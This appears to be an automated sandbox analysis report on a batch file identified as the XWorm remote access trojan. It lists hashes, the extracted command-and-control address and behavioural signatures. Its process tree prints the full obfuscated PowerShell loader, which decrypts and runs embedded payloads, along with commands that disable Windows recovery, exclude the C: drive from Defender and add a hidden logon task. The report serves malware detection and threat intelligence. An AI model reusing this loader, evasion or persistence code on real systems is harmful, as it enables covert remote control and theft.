Overview

overview

10

Static

static

1

fedora.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    47s
  • max time network
    41s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02/03/2025, 20:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fedora.bat

  • Size

    115KB

  • MD5

    a291659c73e487039ba0d4ed584d2335

  • SHA1

    10b534a148cd151d32bf41fb8674acd5bc98493e

  • SHA256

    3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3

  • SHA512

    797c0ab0dc2cf5a5f9012f1426f7766ff7ccf83c287b840254fb7b453d3a79b8cb6d59228cf6ec382cfc4ac6b069714f391efd57008b481a6d247f7da6d09c35

  • SSDEEP

    3072:4YIEoF2PKuQNG88yD/HSkLhKAYzT6CN512EN2ENuN56E5NC6EEuQ6vgo:BIEUAKuL8jNFziT6CN512EN2ENuN56ES

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.154.98.138:5939

Mutex

iVJRN7HmpQeCP6EU

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fedora.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Temp\fedora.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Windows\SYSTEM32\reagentc.exe
        "reagentc.exe" /disable
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:3696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\xbcmxckb2zb1.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2428
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\xbcmxckb2zb1.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3492
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\xbcmxckb2zb1.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\xbcmxckb2zb1.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\SYSTEM32\reagentc.exe
              "reagentc.exe" /disable
              6⤵
              • Drops file in Windows directory
              PID:1084
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3772
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3316
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa776acc40,0x7ffa776acc4c,0x7ffa776acc58
      2⤵
        PID:3528
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1836 /prefetch:2
        2⤵
          PID:2780
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2132 /prefetch:3
          2⤵
            PID:1032
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2232 /prefetch:8
            2⤵
              PID:724
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3160 /prefetch:1
              2⤵
                PID:1628
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
                2⤵
                  PID:4828
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3120,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4420 /prefetch:1
                  2⤵
                    PID:1700
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4620 /prefetch:8
                    2⤵
                      PID:2020
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4464,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4700 /prefetch:8
                      2⤵
                        PID:4968
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4660,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:8
                        2⤵
                          PID:908
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4812,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
                          2⤵
                            PID:2708
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5044 /prefetch:8
                            2⤵
                              PID:5100
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8
                              2⤵
                                PID:3364
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5052 /prefetch:8
                                2⤵
                                  PID:2872
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8
                                  2⤵
                                    PID:1928
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4804,i,7539004090431266964,14137038228770895987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:2
                                    2⤵
                                      PID:2428
                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                    1⤵
                                      PID:244
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                      1⤵
                                        PID:1512

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                        Filesize

                                        649B

                                        MD5

                                        db16303d37f5e8e204f5424bded252d1

                                        SHA1

                                        0dd6787b3dc0b47a9cc701e029c1078b1cc1a8ee

                                        SHA256

                                        a0c6c152719bd8ba2e3fe0b6309a7051ce13afbc74008c34c9d6a2d25520a0d9

                                        SHA512

                                        08b77a357e9105b3041be60fb3f3fc2e48932a4e91a2b3bc441c5bad979db8a9354c43a651492d25263ebd8cd2877329fa6b79e621ec1a16033de6414cccd703

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json
                                        Filesize

                                        851B

                                        MD5

                                        07ffbe5f24ca348723ff8c6c488abfb8

                                        SHA1

                                        6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                        SHA256

                                        6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                        SHA512

                                        7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json
                                        Filesize

                                        854B

                                        MD5

                                        4ec1df2da46182103d2ffc3b92d20ca5

                                        SHA1

                                        fb9d1ba3710cf31a87165317c6edc110e98994ce

                                        SHA256

                                        6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                        SHA512

                                        939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                        Filesize

                                        2B

                                        MD5

                                        d751713988987e9331980363e24189ce

                                        SHA1

                                        97d170e1550eee4afc0af065b78cda302a97674c

                                        SHA256

                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                        SHA512

                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                        Filesize

                                        356B

                                        MD5

                                        451ee8606557972e25c55e1f8f4ed736

                                        SHA1

                                        21a297c99f1715607dedad89e3066f22104ef505

                                        SHA256

                                        0175ddbdc21a33bdbe8a533505199281fb0183ceb6dc2f542ce35df241ead2a5

                                        SHA512

                                        5e99215c39848843852dc7dd0611641aaa2dbf0057891b95420df6bd8aea48626934bf97104a11a2fdccef0aedba3d3abed999d038604f0b5130e88273848f10

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                        Filesize

                                        8KB

                                        MD5

                                        a0724bd7f0194bab6d70bf44cca8ca4d

                                        SHA1

                                        8a414aad45c999d6f554c996a0da81a0d934ddfc

                                        SHA256

                                        c42acd290ff4db4adaa9c317d6c2467cd01e106a2448222efdb64ec40ac6b6c3

                                        SHA512

                                        8d6422c0362b447c6956a112969bcadabceb629ea8cfd21cab8f69941e7768c4e6d72ea72921bd398e54c30c9611ada98a76f0d76c300286bbbc91b87baaa8f3

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                        Filesize

                                        15KB

                                        MD5

                                        c74d98e7229bf3723917c8f53d7cb966

                                        SHA1

                                        4c7068a4402671db26f77f44517c2a3bc75664a5

                                        SHA256

                                        5e7fcc2b1737c507ed0861d26c44a24cab4c56fb294f3ae11871ee91d64d0412

                                        SHA512

                                        48fcc7fceefb03200106e530f6c7673e231029e7566e9e051cf129cef1465d132fc33ad596970e57bf9b2486593792d0c77c8ee379a0944515be862190ffa2af

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
                                        Filesize

                                        72B

                                        MD5

                                        676d64380414aed0f65c8d7a98cd391a

                                        SHA1

                                        f353f28161f798a162459adb4ed7dab7e426ea90

                                        SHA256

                                        0b54b01a3f5c0561839ce6e45784f6907a765b1c2756b4c769dac09e724fccc6

                                        SHA512

                                        44954a8c3631a7474261e8cccafdebfff1d8f2831c1ba72988d1d52ade8718ea9e1ce465b7dfb4597e7b07d61a79771a095ff35ec33867f2fd66b6c510df551d

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\cc3d4ce5-1f99-4d44-b20b-99a5637e19f2.tmp
                                        Filesize

                                        8KB

                                        MD5

                                        5a654f7222b93c49bd4c5e00fb138dc7

                                        SHA1

                                        78867830b410d54c66a2a10cccc6379782c3396e

                                        SHA256

                                        a74697b8a0ae85535f06e265052ca5435ffb20a48e0a4712557f90534780d4ed

                                        SHA512

                                        6a44192d98313f48ff06dae03a6ed0945111f5bd0a0e40efa5c2a073976c31dc0606e8f0e296829bed43bb82ce72a54a11ef634237f764c47a375ae5108037b9

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                        Filesize

                                        245KB

                                        MD5

                                        b311f1add9366ff16d66ba2c203eeaba

                                        SHA1

                                        fb5e9f4d038b5687bcb3e8933d1d0bbb8ee702d7

                                        SHA256

                                        189437f7f60890843f12114e0aae1600c418eeff1872fb9191262f60b16d2ead

                                        SHA512

                                        9574053588a96ff2140e76f498f70a0a3b1fac5968a32864002ba0d8725cc9140fd48a618e1d4e82cf56ce1c6a5804d750b6d6e660254e39e27c03b9eebc8eec

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                        Filesize

                                        2KB

                                        MD5

                                        627073ee3ca9676911bee35548eff2b8

                                        SHA1

                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                        SHA256

                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                        SHA512

                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        1KB

                                        MD5

                                        f65feb0fbbd0fcb9da91d117a38e4f31

                                        SHA1

                                        95b1256dd050df6d555a4d06d4dc7ac542b6a070

                                        SHA256

                                        cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c

                                        SHA512

                                        0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        1KB

                                        MD5

                                        bf7ba0e261d355b51ae4ec107f6fc68f

                                        SHA1

                                        aba8a2d9bbe02335dd74df49392d96779b301fc1

                                        SHA256

                                        dafc551680c4dcb14b42704df77b122151eb4a94294043b671f17b1b91deeadc

                                        SHA512

                                        7f022cf9adf535153e122f9a94a2093379bf2d66ecb3cf17cf7f401806eda5534ba9f17e6ea2c41a257dbb55a54eb2f8c6168ed867ba8aa240eb3ea25bf88c1a

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Realtek-Hub\xbcmxckb2zb1.bat
                                        Filesize

                                        115KB

                                        MD5

                                        a291659c73e487039ba0d4ed584d2335

                                        SHA1

                                        10b534a148cd151d32bf41fb8674acd5bc98493e

                                        SHA256

                                        3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3

                                        SHA512

                                        797c0ab0dc2cf5a5f9012f1426f7766ff7ccf83c287b840254fb7b453d3a79b8cb6d59228cf6ec382cfc4ac6b069714f391efd57008b481a6d247f7da6d09c35

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Realtek-Hub\xbcmxckb2zb1.vbs
                                        Filesize

                                        149B

                                        MD5

                                        907fffe3de910fb2a344f176419597c1

                                        SHA1

                                        241d6e79755eb4492d59aad4388b547f364510d7

                                        SHA256

                                        8dd822539fa14290a2d7f39f5fb0cd2056123a0b8cd63f24331641ffedadc439

                                        SHA512

                                        df2d365301bf291546c9488754a729b632cdcbb61eab8be56a1550314e50825785dfa78e9639d0b491795beae1c7d55b8c186402403022dcd3877a5c49198721

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bgabhfdx.rxi.ps1
                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\scoped_dir3316_135090824\99c4f63f-6add-4d3b-ac4d-7bbeffd2af3c.tmp
                                        Filesize

                                        150KB

                                        MD5

                                        eae462c55eba847a1a8b58e58976b253

                                        SHA1

                                        4d7c9d59d6ae64eb852bd60b48c161125c820673

                                        SHA256

                                        ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

                                        SHA512

                                        494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\scoped_dir3316_135090824\CRX_INSTALL\_locales\en_CA\messages.json
                                        Filesize

                                        711B

                                        MD5

                                        558659936250e03cc14b60ebf648aa09

                                        SHA1

                                        32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

                                        SHA256

                                        2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

                                        SHA512

                                        1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

                                        Download Submit

                                      • C:\Windows\Logs\ReAgent\ReAgent.log
                                        Filesize

                                        2KB

                                        MD5

                                        4c58e9b987d280016a35154e4af81f1c

                                        SHA1

                                        f0cf2d97e9f4d6143cb14ce6844cb45a93d5400f

                                        SHA256

                                        d6a6e34b6f3c2f0f08847d4e5e9826bd3c226ef5d676cdbdf3d74ecad6041a42

                                        SHA512

                                        b6e1e39271ca832640f93c90e1c0ce903fc8f439fb13b2099a6601028ebf973ade127790c72d0c5d6566dd6e8f13498ff9d0a5a247e2bd8f3599d845274fc05b

                                        Download Submit

                                      • C:\Windows\Panther\UnattendGC\diagerr.xml
                                        Filesize

                                        11KB

                                        MD5

                                        fb4a7c0483f085e58f65cad0b7c04a1a

                                        SHA1

                                        c806fc0b2a76b57e711e3ad8948354d188490fa5

                                        SHA256

                                        ece65f8c300d778f7b3e5200828321306727fa9ca7658dfcef6f8169ee53654f

                                        SHA512

                                        43d64ba9eb57e8f365b1cfd299f26e03bbf2fa18d0a913c75e145582fedfa069af91406de308aa163f95a2f5c03439f26d4923983bf1385b228a6026cd8ae4c5

                                        Download Submit

                                      • C:\Windows\Panther\UnattendGC\diagwrn.xml
                                        Filesize

                                        12KB

                                        MD5

                                        99ce239ee8e3be7b483558c3e4c8fb2b

                                        SHA1

                                        c47def44231663351824bcb95de62b91a593d2b9

                                        SHA256

                                        2476e8feb667bf6a0c964963094979fb965cdfb045ed30c06871ff81c4593270

                                        SHA512

                                        a0043529009e2378241871b451ffc6eb6060b08481d3323942296618fd54b682acc579315a5a5f338ddc0882e09ab22d7c863c1fdf6bd26cbf6752415ddc9279

                                        Download Submit

                                      • C:\Windows\system32\Recovery\ReAgent.xml
                                        Filesize

                                        1KB

                                        MD5

                                        910f3916ede823b6b4b5e302e6ececbe

                                        SHA1

                                        d41dda3f32687605193ad0f421c6b3e2bc48ec97

                                        SHA256

                                        5cd6fa01b3949b7fca0fdbdab434d93badcfcdf09de8e2881268abf7ed7064fa

                                        SHA512

                                        893f4a7f2cb3b6aa2ebd0e82f1ab55658b4e7791872bfb97dd269c35df0199c9b590e0902a83cfc8ae85f883f8adb6f514593d4dde68d2c0a5406ecc7851f582

                                        Download Submit

                                      • memory/1512-13-0x000002D242550000-0x000002D242562000-memory.dmp

                                        Filesize

                                        72KB

                                        Download

                                      • memory/1512-1-0x00007FFA9F7B0000-0x00007FFA9F853000-memory.dmp

